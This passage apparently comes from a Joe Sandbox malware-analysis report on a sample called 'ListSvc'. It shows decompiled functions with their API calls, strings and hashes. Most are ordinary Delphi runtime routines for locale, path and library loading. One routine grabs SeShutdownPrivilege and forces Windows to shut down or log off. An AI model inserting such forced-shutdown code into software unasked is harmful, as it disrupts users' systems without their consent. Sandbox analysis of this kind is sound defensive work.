													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9

Strings

GetLongPathNameW, xrefs: 0040A950
kernel32.dll, xrefs: 0040A940
\, xrefs: 0040AA86

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x004af11b
0x004af178
0x004af17c
0x004af184
0x00000000
0x004af186
0x004af12d
0x004af13f
0x004af144
0x004af14c
0x004af166
0x004af172
0x00000000
0x00000000
0x00000000
0x004af174
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C

Strings

SeShutdownPrivilege, xrefs: 004AF138

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF

Uniqueness

Uniqueness Score: -1.00%

Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}

APIs

GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D

Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861

Strings

VarBstrFromDate, xrefs: 00427A43
VarIdiv, xrefs: 00427925
VariantChangeTypeEx, xrefs: 0042788B
VarNeg, xrefs: 004278A1
VarAdd, xrefs: 004278CD
VarCmp, xrefs: 00427993
VarSub, xrefs: 004278E3
VarI4FromStr, xrefs: 004279A9
VarNot, xrefs: 004278B7
VarOr, xrefs: 00427967
VarR4FromStr, xrefs: 004279BF
VarMul, xrefs: 004278F9
oleaut32.dll, xrefs: 00427878
VarMod, xrefs: 0042793B
VarBstrFromCy, xrefs: 00427A2D
VarBoolFromStr, xrefs: 00427A17
VarDateFromStr, xrefs: 004279EB
VarAnd, xrefs: 00427951
VarXor, xrefs: 0042797D
VarBstrFromBool, xrefs: 00427A59
VarDiv, xrefs: 0042790F
VarCyFromStr, xrefs: 00427A01
VarR8FromStr, xrefs: 004279D5

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}

APIs

GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999

Strings

K, xrefs: 0041E8DD
ToA, xrefs: 0041E9BC
B.C., xrefs: 0041E8FA
K, xrefs: 0041EA09
K, xrefs: 0041E827

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CalendarEnumInfoLocaleThread
String ID: B.C.$ToA$K$K$K
API String ID: 683597275-1724967715
Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}

0x0040a255
0x0040a25a
0x0040a268
0x0040a270
0x0040a27e
0x0040a295
0x0040a2af
0x0040a2c4
0x0040a2c9
0x00000000
0x0040a2c9
0x0040a2ce

APIs

InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Strings

SetThreadPreferredUILanguages, xrefs: 0040A29A
GetThreadPreferredUILanguages, xrefs: 0040A280
GetThreadUILanguage, xrefs: 0040A2B4
kernel32.dll, xrefs: 0040A285, 0040A29F, 0040A2B9

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
API String ID: 74573329-1403180336
Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}

APIs

IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC

Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093

Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052

Strings

AMPM , xrefs: 0041E319
m/d/yy, xrefs: 0041E1DD
:mm:ss, xrefs: 0041E344
ToA, xrefs: 0041E0E9
2, xrefs: 0041E36D
mmmm d, yyyy, xrefs: 0041E202
AMPM, xrefs: 0041E30A
:mm, xrefs: 0041E329

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Locale$Info$ThreadValid
String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
API String ID: 233154393-2808312488
Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}

APIs

EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD

Strings

en-US,en,, xrefs: 0040A812, 0040A8B9

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
